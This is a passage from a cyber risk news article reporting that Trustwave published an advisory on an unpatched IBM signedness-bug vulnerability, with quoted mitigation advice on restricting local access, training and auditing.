The vulnerability, which is caused by a signedness bug issue, was initially reported to the vendor on August 15, 2018. The 90-day deadline was extended on November 14, but on December 17, IBM confirmed that no patch was available, at which point Trustwave published the vulnerability advisory.

In lieu of a patch, Kettle wrote that “the risk of this vulnerability is slightly mitigated by requiring local access, so those affected are recommended to verify that only authorized users can log in to those systems," the risk of the vulnerability being exploited can be slightly mitigated.

In addition, he wrote, “security awareness training can also help prevent local malware or social engineering attacks. Finally, you may want to step up auditing of any affected systems for signs of infection.”

Categories: Cyber Risk News